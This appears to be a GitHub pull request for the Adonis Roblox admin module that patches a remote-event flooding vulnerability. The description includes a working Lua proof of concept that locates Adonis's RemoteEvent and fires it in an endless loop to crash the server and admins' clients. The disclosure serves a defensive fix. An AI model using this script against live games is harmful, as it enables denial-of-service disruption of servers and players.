### PR TITLE
Fixed crash exploit

### DIFF
--- a/MainModule/Server/Core/Process.lua
+++ b/MainModule/Server/Core/Process.lua
@@ -173,7 +173,7 @@ return function(Vargs, GetEnv)
 									Desc = "Player requested key from server",
 									Player = p;
 								})
-							elseif UnEncrypted[com] then
+							elseif rateLimitCheck and UnEncrypted[com] then
 								AddLog("RemoteFires", {
 									Text = p.Name.." fired "..tostring(com),
 									Desc = "Player fired unencrypted remote command "..com,
@@ -206,7 +206,7 @@ return function(Vargs, GetEnv)
 								warn(string.format("%s is firing Adonis's RemoteEvent too quickly (>Rate: %s/sec)", p.Name, 1/Process.RateLimits.Remote));
 							end
 						else
-							Anti.Detected(p, "Log", "Out of Sync (r10005)")
+							Anti.Detected(p, "Kick", "Invalid Remote Data (r10005)")
 						end
 					end
 				end


### PR DESCRIPTION
Fixes a vulnerability where you can crash the server and all the admins. You can either spam the unencrypted communications or spam invalid data.

The exploit allows you to GPUCrash all admins as well as soft crash the server.

Example code to crash server with vulnerability:
```
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local function waitForDescendant(parent, name)
	local descendant = parent:FindFirstChild(name, true)
	if descendant then return descendant end
	while true do
		descendant = parent.DescendantAdded:Wait()
		if descendant.Name == name then
			return descendant
		end
	end
end

local function GetAdonisRemote(canYield)
	if canYield == true then
		waitForDescendant(ReplicatedStorage, "__FUNCTION")
	end

	for _, v in ipairs(ReplicatedStorage:GetChildren()) do
		if v:IsA("RemoteEvent") then
			local adonisRemoteFunc = v:FindFirstChild("__FUNCTION")
			if adonisRemoteFunc and adonisRemoteFunc:IsA("RemoteFunction") then
				return v
			end
		end
	end

	return nil
end

local rem = GetAdonisRemote(true)

while true do
	task.wait()
	for i = 1, 50 do
		rem:FireServer({}, 1)
	end
end
```